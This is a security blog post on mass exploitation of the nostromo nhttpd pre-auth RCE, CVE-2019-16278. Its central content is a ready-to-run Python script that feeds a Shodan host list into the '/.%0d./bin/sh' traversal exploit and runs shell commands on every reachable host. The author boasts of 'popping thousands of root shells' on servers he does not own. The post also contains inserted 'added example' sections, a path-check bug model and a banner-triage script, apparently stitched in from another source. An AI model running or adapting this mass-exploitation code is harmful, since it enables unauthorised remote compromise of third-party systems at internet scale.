Mass Exploitation, Hunting While Sleeping


~ 4 minute read
Crafted: 4 months ago. Updated: 1 week ago.
Tags: #infosec #guide #cybersecurity #bug-bounty #vulnerability #iot #shodan #zoomeye #censys

Hello Luvs,

This post is just another brain dump, like the last post. Today we are going to talk about mass exploitation. Criminals usually use mass exploitation to control as many hosts as they can. As you may know, I've worked on a tool called Hunter Suite, which aimed to be a revolution for bug hunting. But my life is so unpredictable these days; I'm not sure when or if I really can finish it (too much work for one boy). That's why I started sharing my thoughts, in the hope that someone out there will find it useful.


Introduction 

Botnets are generally very successful at exploiting vulnerable IoT devices and web applications because of the sheer number of exploitable hosts out there. You can check out the list of exploits used by Mirai and, more recently, Mozi. The fun fact is that most bot authors are not familiar with exploit development concepts (even though IoT exploits are a breeze to write compared to harder stuff like browsers), so they usually use public and, in most cases, outdated exploits.

One component of Hunter Suite is exploiting hot vulnerabilities, using either of these two methods:

 

  • slightly modify and use an excellent 1-day exploit 
    • fixing reliability issues and crashes 
    • changing payloads 
  • conduct a patch analysis to mine a 1-day
    • Reverse the patch and extract the bug
    • Write an exploit 

What's a good 1-day exploit?

Well, it depends, but usually you don't want to waste your time writing an exploit for a target with fewer than five users.

So, for example, in the case of web exploitation, here are some worthy targets. 

 

Content management systems (also their plugins):

  • WordPress
  • Joomla
  • Drupal
  • ...

Backend Web Frameworks:

  • Rails
  • Django
  • Laravel
  • ...

Front End Frameworks:

  • Vue
  • Angular
  • React
  • Bootstrap 
  • ...

Web Servers:

  • Nginx
  • Apache
  • lighttpd
  • ....

Internet of things: 

  • Big market Routers 
  • IP cameras 
  • SCADA
  • ....

You get the idea. 

Practicality 

As you aren't malicious, you won't need an implant or backdoor. Botnets usually have to build several versions of their implants (MIPS, ARM, x86, x86-64, etc.) to maximize their infection rate.

Next, scan the whole target IP space (e.g., your bug bounty pipeline) for vulnerable assets. There are a few tools on the market for attack surface discovery, like assetnote.io and immuniweb. You can also leverage APIs like shodan.io, zoomeye.org and censys.io to make your life easier. Here is an illustration for visual people.

 

 

CVE-2019-16278 nhttpd (nostromo) < 1.9.7 pre-auth RCE

 

As you see in all my previous posts, I like to have a practical case study. For the sake of this post, I chose a very recent vulnerability in nhttpd.

Here is the original exploit, and here is a detailed vulnerability analysis, so I will jump straight into a live example. If we search for nostromo on, for instance, shodan.io, we see thousands of running instances.
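To make the bug class concrete before the live run, here is an added Python model of why the `/.%0d./` segments in the public exploit path slip past a naive traversal check, beside the safe ordering. This is example code written for this page, not nhttpd's source and not from the original post: it assumes a check-then-strip order (reject `..` on the decoded path first, remove CR/LF afterwards) and a hypothetical document root, and does not reproduce the real server's function names or control flow.

```python
"""Added example (not from the post, not nhttpd's source): a model of the
traversal-check-ordering bug behind CVE-2019-16278 and the safe ordering.

Assumptions: the vulnerable pattern rejects '..' on the decoded path and only
afterwards strips CR/LF, so '.%0d.' (".\r.") passes the check and reaches the
filesystem as '..'. DOCROOT is a hypothetical document root.
"""
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/nostromo/htdocs"   # hypothetical document root


def strip_cr_lf(s):
    """Drop carriage returns and line feeds from a request path."""
    return s.replace("\r", "").replace("\n", "")


def resolve_path_vulnerable(request_path):
    """Check-then-strip ordering: the '..' check never sees '.\\r.' as '..'.

    Returns the absolute path the OS would actually open, or None if rejected.
    """
    decoded = unquote(request_path)               # '/.%0d./x' -> '/.\r./x'
    if "/../" in decoded or decoded.startswith("../"):
        return None                               # the only traversal guard
    cleaned = strip_cr_lf(decoded)                # '.\r.' has now become '..'
    # The server hands DOCROOT + cleaned to open(); the kernel resolves '..',
    # which normpath reproduces here.
    return posixpath.normpath(DOCROOT + cleaned)


def resolve_path_fixed(request_path):
    """Decode and strip first, canonicalize, then enforce containment in DOCROOT."""
    decoded = strip_cr_lf(unquote(request_path))
    full = posixpath.normpath(posixpath.join(DOCROOT, decoded.lstrip("/")))
    if full != DOCROOT and not full.startswith(DOCROOT + "/"):
        return None
    return full


if __name__ == "__main__":
    exploit = "/.%0d./.%0d./.%0d./.%0d./bin/sh"   # path used by the public exploit
    print("vulnerable ->", resolve_path_vulnerable(exploit))   # /bin/sh
    print("fixed      ->", resolve_path_fixed(exploit))        # None
```

The takeaway is the ordering: any filter that runs before the last transformation of the path (decoding, control-character stripping, case folding) can be bypassed by hiding the dangerous token behind that transformation. Canonicalize completely, then check that the result is still inside the document root.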

 

Now, all we have to do is detect and exploit the vulnerable instances. As I have said before, these days this can be done very quickly. So all we have to do is parse our host list (in this case a Shodan export) and try to exploit the vulnerable instances.

 

Here is what your script can look like.
 

"""
@author: 0xSha
@contact: [email protected]
@organization: www.0xsha.io
"""

import csv
import requests

# in case of debugging and hosting detection
# import json
# import time


def read_hosts_from_csv():
    """
    Reads the Shodan CSV dump and extracts host and port pairs.
    :return: list of "host:port" strings
    """
    path = '/shodan-export.csv'  # path to the Shodan CSV export
    host_lists = []
    with open(path, newline='') as csvfile:
        records = csv.reader(csvfile)
        for record in records:
            # the first two columns of the export are IP and port
            host_lists.append(record[0] + ":" + record[1])
    return host_lists


if __name__ == '__main__':
    # proxy = {"http": "http://127.0.0.1:8080"}
    # CVE-2019-16278: the ".%0d." segments slip past nhttpd's traversal check
    exp = "/.%0d./.%0d./.%0d./.%0d./bin/sh"
    for host in read_hosts_from_csv():
        host, port = host.split(':')
        # Lazy me: skip the CSV header row instead of checking column names
        if "IP" not in host:
            # Debugging request
            # req = requests.post('http://' + host + ":" + port + exp,
            #                     data='ifconfig 2>&1; echo "~~~~~~~~~"; id; echo "##########";',
            #                     timeout=3, proxies=proxy)
            try:
                cmd = "whoami;id;uname -a"
                print("[~] Trying ... " + host, port)
                # the POST body is fed to /bin/sh; the markers delimit its output
                req2 = requests.post('http://' + host + ":" + port + exp,
                                     data='ifconfig 2>&1; echo "~~~~~~~~~~"; ' + cmd + ' ; echo "##########";',
                                     timeout=10)  # change the timeout if needed
                # print (req2.status_code)
                # print (req2.text)
                firstIndex = str(req2.text).find('~~~~~~~~~~')
                secondIndex = str(req2.text).find('##########')

                # find() returns -1 (which is truthy) when a marker is missing,
                # so test explicitly instead of "if firstIndex:"
                if firstIndex != -1 and secondIndex != -1:
                    print("#################### Vulnerable #######################")
                    print("[+] Now exploiting " + host)
                    print(str(req2.text)[firstIndex + 10:secondIndex])

                    # Host Detection
                    # time.sleep(10)
                    # req3 = requests.get(
                    #     'https://www.who-hosts-this.com/APIEndpoint/Detect?key'
                    #     '=YOUR_API_KEY&url=' + host)
                    # isp = json.loads(req3.text)
                    # print("Hosted by:" + isp['results'][0]['isp_name'])

                    print("#################### End #######################")
            except requests.RequestException:
                # unreachable host, timeout or reset: move on to the next one
                # print('Err' + host)
                pass

 

You can also download the script from here. Now all we have to do is run our script and pour ourselves a coffee.
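The script above fires the exploit at every row of the export. A practitioner running this against a bounty pipeline would first triage the export by banner so that exploit traffic only goes to hosts that can actually be affected, and would parse the marker-delimited response without the `find() == -1` pitfall. The following is an added example written for this page, not the post's script: it assumes the export carries columns named `ip_str`, `port` and `data` (raw banner), and `SAMPLE_EXPORT` is a constructed sample using documentation-range addresses, not real scan data.

```python
"""Added example (not the post's script): triage a Shodan CSV export by banner
version so exploit traffic only goes to hosts that can be vulnerable, and parse
a marker-delimited response without the 'find() == -1' pitfall.

Assumptions (not from the post): column names 'ip_str', 'port' and 'data'
(raw banner) in the export; SAMPLE_EXPORT is constructed for this example.
"""
import csv
import io
import re

# nostromo announces itself as e.g. "Server: nostromo 1.9.6".
# CVE-2019-16278 affects releases before 1.9.7.
NOSTROMO_RE = re.compile(r"Server:\s*nostromo\s+(\d+)\.(\d+)\.(\d+)", re.IGNORECASE)
FIXED_VERSION = (1, 9, 7)

START_MARKER = "~~~~~~~~~~"
END_MARKER = "##########"

SAMPLE_EXPORT = (  # constructed sample, documentation-range addresses
    "ip_str,port,data\n"
    '203.0.113.10,80,"HTTP/1.1 200 OK\nServer: nostromo 1.9.6\n"\n'
    '203.0.113.11,8080,"HTTP/1.1 200 OK\nServer: nostromo 1.9.7\n"\n'
    '203.0.113.12,80,"HTTP/1.1 200 OK\nServer: nginx/1.18.0\n"\n'
    '203.0.113.13,80,"HTTP/1.1 200 OK\nServer: nostromo 1.10.0\n"\n'
    '203.0.113.14,80,"HTTP/1.1 200 OK\nServer: NOSTROMO 1.9.5\n"\n'
)


def parse_nostromo_version(banner):
    """Return (major, minor, patch) from a nostromo Server header, else None."""
    m = NOSTROMO_RE.search(banner)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable_version(version):
    """Tuple comparison orders 1.10.0 after 1.9.7; string comparison would not."""
    return version < FIXED_VERSION


def triage_export(csv_text):
    """Return (ip, port, version) for rows whose banner says nostromo < 1.9.7.

    csv.DictReader handles the multi-line quoted banner field for us.
    """
    candidates = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        version = parse_nostromo_version(row.get("data", ""))
        if version is not None and is_vulnerable_version(version):
            candidates.append((row["ip_str"], int(row["port"]), version))
    return candidates


def extract_marked_output(body):
    """Return the text between START_MARKER and END_MARKER, or None.

    str.find() returns -1 when a marker is absent, and -1 is truthy, so a bare
    'if index:' test would report every responding host as vulnerable.
    """
    start = body.find(START_MARKER)
    if start == -1:
        return None
    end = body.find(END_MARKER, start + len(START_MARKER))
    if end == -1:
        return None
    return body[start + len(START_MARKER):end].strip()


if __name__ == "__main__":
    for ip, port, version in triage_export(SAMPLE_EXPORT):
        print("[~] candidate %s:%d nostromo %s" % (ip, port, ".".join(map(str, version))))
    print(extract_marked_output("HTTP junk\n~~~~~~~~~~\nuid=0(root)\n##########\n"))
```

Banner-based triage is only a pre-filter: a backported fix or a rewritten Server header will mislead it in either direction, so the exploit request (or a non-destructive probe) is still the confirmation step. The payoff is fewer requests to hosts that cannot be affected, which matters when the list is thousands of entries long.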

 

Popping thousands of root shells 

 

Here is the video for demo lovers. 

 

 

Conclusion 

 

The number of vulnerable hosts out there is unbelievable. More internet-wide bug bounty programs are needed to slay these bugs; otherwise botnets will keep getting easy wins just by using 1-day exploits.

Careful luvs, what I demonstrate here can get you in legal trouble. In my case, I didn't alter, download or touch any data on the few servers I tested, and the only commands I ran were a harmless id to prove the vulnerability. Do not pwn what you don't own.

 

 

So here is a summary 

  • know your assets 
  • set the alarm for worthy patches and exploits 
  • continuously scan your pipeline for new instances
  • detect and exploit 
  • report and claim your bounty 

 

Infosec has always been a part of my life. I made a living out of it, but I somehow feel people care less every day (maybe because they can't do anything about it?!), so in the end I'm probably better off creating drama TV shows ;) rather than talking about fuzzing, exploitation, reverse engineering and how I spent thousands of bucks and most of my life on infosec and SciTech. Yet again, here I am.

 

till then luvs 
